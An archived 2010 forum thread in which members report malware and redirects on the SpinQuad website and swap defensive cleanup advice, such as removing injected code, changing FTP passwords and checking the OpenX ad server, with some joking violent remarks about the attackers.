PDA

View Full Version : Spinquad hijack attack!!



prometheus
07-19-2010, 11:50 AM
I was about to browse trough spinquad.com
I was using opera and then seamonkey ..opera became freezed and seamonkey was directly redirecting to another site located somewhere at http://yandex.ru.

Looks to me that someone constantly has been attacking spinquad with
spam,viruses and hijacks..itīs a petty since people might be scared away from the site.
I havenīt tested with explorer or firefox yet.

Michael

Elmar Moelzer
07-19-2010, 12:04 PM
Had the same happening to me today with IE.
My antivirus software cought the bugger, but IE crashed anyway.
What a fracking bastard!
Really, if I ever catch one of these people there will be a bloodbath!

roctavian
07-19-2010, 12:11 PM
Really, if I ever catch one of these people there will be a bloodbath!

You always looked such a peaceful guy to me, Elmar.

speismonqui
07-19-2010, 12:33 PM
what if its an AD guy?

Elmar Moelzer
07-19-2010, 12:34 PM
I am normally a very peaceful guy, but I there are a few things that I can not tollerate. These people and their deeds are among them.

Hopper
07-19-2010, 12:39 PM
I put SpinQuad on my "blocked" list after the last go-round. I haven't seen the need to visit the site recently anyway .. pretty much dead.

Elmar Moelzer
07-19-2010, 12:45 PM
pretty much dead

I did not quite see it that way, actually. But the viruses make me angry!
That is bad for my heart.

Cageman
07-19-2010, 12:52 PM
Had the same happening to me today with IE.
My antivirus software cought the bugger, but IE crashed anyway.
What a fracking bastard!
Really, if I ever catch one of these people there will be a bloodbath!

Hehe... you will make them look like your avatar!!! :D

Avast reported a malware from SpinQuad just recently... :/

shrox
07-19-2010, 12:52 PM
...That is bad for my heart.

Well, at least you have an excellent visualization of it...

3dworks
07-19-2010, 12:58 PM
looking fine here with safari 5 under OSX...

Matt
07-19-2010, 01:01 PM
Had the same happening to me today with IE.
My antivirus software cought the bugger, but IE crashed anyway.
What a fracking bastard!
Really, if I ever catch one of these people there will be a bloodbath!

1000000% behind you dude, these people are total scumbags.

Elmar Moelzer
07-19-2010, 03:03 PM
Well, at least you have an excellent visualization of it...
Yeah my avatar should give you an idea what the guy would look like when I am half way through with him ;)

Salv8or
07-19-2010, 05:19 PM
Noticed the same thing while trying to access Spinquad earlyer today. Sooo Freaking enoying, and what do they gain from it??? A couple of site hits?? Ill give you guys an aliby anyday to do what you like with the persons behind things like this.

3dWannabe
07-19-2010, 05:22 PM
Try Firefox http://www.mozilla.com/en-US/

with NoScript
https://addons.mozilla.org/en-US/firefox/addon/722/

Lightwolf
07-19-2010, 05:46 PM
Hm, I just checked with Opera and had no problems.

And yes, I normally do get warned by Avast.

Cheers,
Mike

kurv
07-19-2010, 11:18 PM
We caught it and fixed it... thanks guys.

Yes if I ever catch one of these guys... I will take them straight to Elmar ;)

Silkrooster
07-19-2010, 11:44 PM
We caught it and fixed it... thanks guys.

Yes if I ever catch one of these guys... I will take them straight to Elmar ;)

You take the feet. I have their arms...:devil: (did I say that? snort,snort {Steve Erkle's voice})

OnlineRender
07-20-2010, 02:37 AM
We caught it and fixed it... thanks guys.

Yes if I ever catch one of these guys... I will take them straight to Elmar ;)

But didn't frodo take the ring to mordor ................
(IT CROWED QUOTE ) :P

aurora
07-20-2010, 01:26 PM
Hey, I get first crack at one of these [email protected][email protected]%#'s. Death is too easy, long slow, never ending torture, ahh, now thats the balm to sooth the pain of dealing them them demonic [email protected][email protected]%#'s.

kurv
07-20-2010, 03:43 PM
Okay..... quietly shifts his concern from Elmar to aurora...........

wjo53
07-20-2010, 03:53 PM
Hey, I get first crack at one of these [email protected][email protected]%#'s. Death is too easy, long slow, never ending torture, ahh, now thats the balm to sooth the pain of dealing them them demonic [email protected][email protected]%#'s.

...hang him by the eyelids, and beat him in the b*lls until he blinks...

Elmar Moelzer
07-20-2010, 03:55 PM
I think these bastards all have small reproductive organs. That is why they are so eager to get attention...

Cageman
07-20-2010, 07:03 PM
I just recently visited SpinQuad and I still get warnings from Avast. :/

andrew_y
07-20-2010, 08:44 PM
ya it's still there as of 9:25 CST.

If this is what I am thinking it is... Lemme explain what is going on here, and how to combat it.

First, a question...Is this an iframe/html.inf issue? do you see a line of code at the bottom of the page?

If so, read on, if not, ignore.

You need to take a close look at any file with the word "index" in it, as well as all .js files... always at the bottom of the file, there is a line of code, remove it. Do the same with all .js files.

Next, remove all passwords from your FTP app.

Scan and clean your local computer. (avast and malwarebytes works well for this)

Change ALL passwords via the admin control panel or whatever, on your server, that is associated to what you had stored in the FTP app.

This particular trojan will steal passwords from popular FTP apps. It is dropped onto your local machine via an infected site or banner. Once it is on your local machine, it sniffs out the passwords stored in an FTP app, then phones home. Person gets the info, logs in, and utilizes the server for spam e-mail.

The catch here is, when someone visits the site, it replicates it self, and the villain in this case has a never ending supply of FTP credentials to log into to host spam images and such.

Best way to stay safe? Store no passwords in your FTP. Even if you get it, it won't phone home, cuz there is no data to relay.

If your on win7, look at the folder:
c/users/username/AppData/Local .. or ..
c/users/username/AppData/roaming

In that location is where some wack exe's will reside at the root. There will be a few references to them in the registry as well.

Good luck

Cageman
07-20-2010, 08:54 PM
Andrew,

Was your message targeted to Kurv, or us who have visited the site?

Since Avast have stopped this bugger for some time, I'm pretty sure I'm clean. I also took a look inside the folders you mentioned and could not find any weirdness there (thanks to Avast memory protection). :)

andrew_y
07-20-2010, 09:12 PM
It's more of an education type of response for whomever reads it. It may effect others too. It's just better if we are all educated on this, so we know what to look for if this is the case.

I cannot say for sure what is happening here on SQ, I could be totally wrong on this issue, however, it seems to me that this has popped up a few times and kinda fits the profile of this particular issue... and just wanted to bring it up. It is a well known and documented hunk of malware, but it can be tricky too.

I hate to see these things proliferate across the net, and the more one is educated on what this is exactly, the better off we are on stopping it on many angles in the future.

danielkaiser
07-20-2010, 09:54 PM
Don't know if this will help but here is the error I get.

inquisitive
07-21-2010, 01:40 PM
Please do not send spinquad email newsletters until you cure your virus issue. I just clicked on one of the newsletter links and right off the bat received a warning from Norton.

Risk Name: MSIE Java Deployment Toolkit Input Invalidation
Attacker URL: why include it - we dont want more people to go get infected.

The issue is obviously not fixed.
First thing I would do would be to suspend all of your ads, turn them off and see if the issue goes away, and backtrack from there. Either the site itself is compromised, or one ad campaign is the culprit.

Waves of light
07-21-2010, 01:49 PM
Utter set of BĢ*$Ģ$(* the lot of em. Nothing better to do... 'oh, guys... check this it out, it will be hilarious'. Bet none of them ever get laid.

kurv
07-21-2010, 01:58 PM
I have scanned the site with Norton and get no notices. Have you tried deleting your cache and try it again?

kurv
07-21-2010, 02:10 PM
It's more of an education type of response for whomever reads it. It may effect others too. It's just better if we are all educated on this, so we know what to look for if this is the case.

I cannot say for sure what is happening here on SQ, I could be totally wrong on this issue, however, it seems to me that this has popped up a few times and kinda fits the profile of this particular issue... and just wanted to bring it up. It is a well known and documented hunk of malware, but it can be tricky too.

I hate to see these things proliferate across the net, and the more one is educated on what this is exactly, the better off we are on stopping it on many angles in the future.

Thanks Andrew, I appreciate the help :)

We fixed this issue a few days ago, and yes it was a small line of code. We changed passwords and locked down the site. Just as you instructed...

We have scanned the site with Norton using Chrome and Firefox and found no errors, especially before sending out a newsletter. :)

inquisitive
07-21-2010, 03:02 PM
I was using IE8, if you don't check your site with all browsers you may not find the issue. If the issue is rogue ad campaign, the bad guys can target to only display to specific browsers. I could use Firefox (and mainly use it, but I just so happened to be using IE8 this time).

Here is the screencap if the incident I just reported.

inquisitive
07-21-2010, 03:34 PM
I suggest all of you that receive warnings to do a full scan as well... I just did (still going) it seems that while it blocked the attack it was not able to fully prevent it.

kurv
07-21-2010, 04:29 PM
Weird, I have scanned the site and I also have IE8 as well as Chrome, FireFox and Safari.

We are not finding any issues.

If there were a banner issue, I have refreshed the page now many many times and never get an alert from IE8. If this is a banner the chances of you hitting it every-time are astronomical.

Otherwise it would be a site issue and again, scan image is below from Norton and IE Live Scan.

http://www.spinquad.com/post/SQ-Security-image.jpg

inquisitive
07-21-2010, 06:26 PM
You may want to check your version of OpenX, perhaps that is the culprit.
More attacks using compromised OpenX ad-servers
http://www.sophos.com/blogs/sophoslabs/?p=10343

The other suggestions would be:
FTP a copy of your forum files (offline backup) to your local windows machine and then have clamwin run on that folder (I have found compromised wordpress files that way).

If you have the latest version of your ad server running then it could be a third party campaign or a flash campaign.
Re: refreshing browser multiple times.. did you clear your cookies everytime you refresh? some ad campaigns (general and bad ones) are set to frequency capping and in some cases targetted to specific browsers and/or geographical areas.. by clearing your cookies you basically reset that frequency cap.

Anyways, I hope you guys clear this issue, otherwise the only way to view the site safely would be to run noscript plugin for firefox or some ad blocker (or use a Mac).

Please let us know what your findings are.

Thanks

Myagi
07-21-2010, 06:27 PM
If there were a banner issue, I have refreshed the page now many many times and never get an alert from IE8. If this is a banner the chances of you hitting it every-time are astronomical.

Sorry to butt in, but aren't many ad banner services often region/country sensitive, meaning it's not certain you'll get all the same banners someone else might. Not that I know if the spinquad banners are of that nature, or what region the poster is in (or if there are different banners for different regions inside the US).

Just thought I'd throw that in there :)

OlaHaldor
07-21-2010, 10:53 PM
looking fine here with safari 5 under OSX...

As ignorant as I or we Mac users can be... Doesn't it look good here on the other side of the fence? The grass is definitely greener.. :bday:

Lewis
07-22-2010, 02:03 AM
NOD32 pop ups like mad man visiting spinquad.com. About 10 alerts/js/trojan stuff (just tried it now).

EDIT: Here is screen grab of what NOD32 said about "threats"

Kuzey
07-22-2010, 07:57 AM
SQ is launching media player and trying to download an encrypted file :(

Also, on the SQ site, it tells me I need an additional plugin and has a button to download it....firefox & XP pro.

Hope that helps to narrow it down.

Kuzey

Lightwolf
07-22-2010, 08:05 AM
SQ is launching media player and trying to download an encrypted file :(
It sounds like one of these:
http://www.h-online.com/security/features/CSI-Internet-Alarm-at-the-pizza-service-1019940.html
(Quite an interesting read if you want to know what's actually happening behind the scenes)

Cheers,
Mike

OnlineRender
07-23-2010, 01:52 PM
Sorry to butt in, but aren't many ad banner services often region/country sensitive, meaning it's not certain you'll get all the same banners someone else might. Not that I know if the spinquad banners are of that nature, or what region the poster is in (or if there are different banners for different regions inside the US).

Just thought I'd throw that in there :)

COrrect /\ but also dependant on who your banner source is . . so that would be a yes again . . also works on keyword sensitive .

OnlineRender
07-23-2010, 02:19 PM
You may want to check your version of OpenX, perhaps that is the culprit.


welldone Sherlock ! :thumbsup: spot on !

if I was betting man , "which I am " I would have a small wager on that . . . .but there is also something else running .

VicMackey
07-23-2010, 06:28 PM
Guys as of last night (23rd July) it was still there and I got a nasty dose of it, straight from a link from an email from SQ. It wasn't in my cache because I haven't been to the forum for weeks nor did I visit that page before. I've outlined the problem and infections I caught in this thread:
http://www.newtek.com/forums/showthread.php?t=110810&page=2

aurora
07-23-2010, 10:55 PM
Vic, we know and as of right now its worse. Wes has contacted the people at VB and we have purchased VB4 and will be updating asap and making a couple other changes to fix this problems.

Thank you for the information you have provided. ALL information is extremely helpful in fixing this problem and thus very much appreciated!

inquisitive
07-23-2010, 11:02 PM
If the situation is that bad, you guys should just take the site offline. No sense having people get infected, also you just give the bad guys more opportunities to cause trouble. If you guys have static IP addresses at home, lock down the server so only connections from those IP's are allowed to connect (ssh/ftp - you should really be using sftp). (you may just have to wipe out the server and reinstall everything and hopefully you had current backups).

slacer
07-24-2010, 12:39 AM
And don't forget to check if the backup is already infected.

VicMackey
07-24-2010, 09:17 AM
Vic, we know and as of right now its worse. Wes has contacted the people at VB and we have purchased VB4 and will be updating asap and making a couple other changes to fix this problems.

Thank you for the information you have provided. ALL information is extremely helpful in fixing this problem and thus very much appreciated!

No worries. Hope you get it sorted :)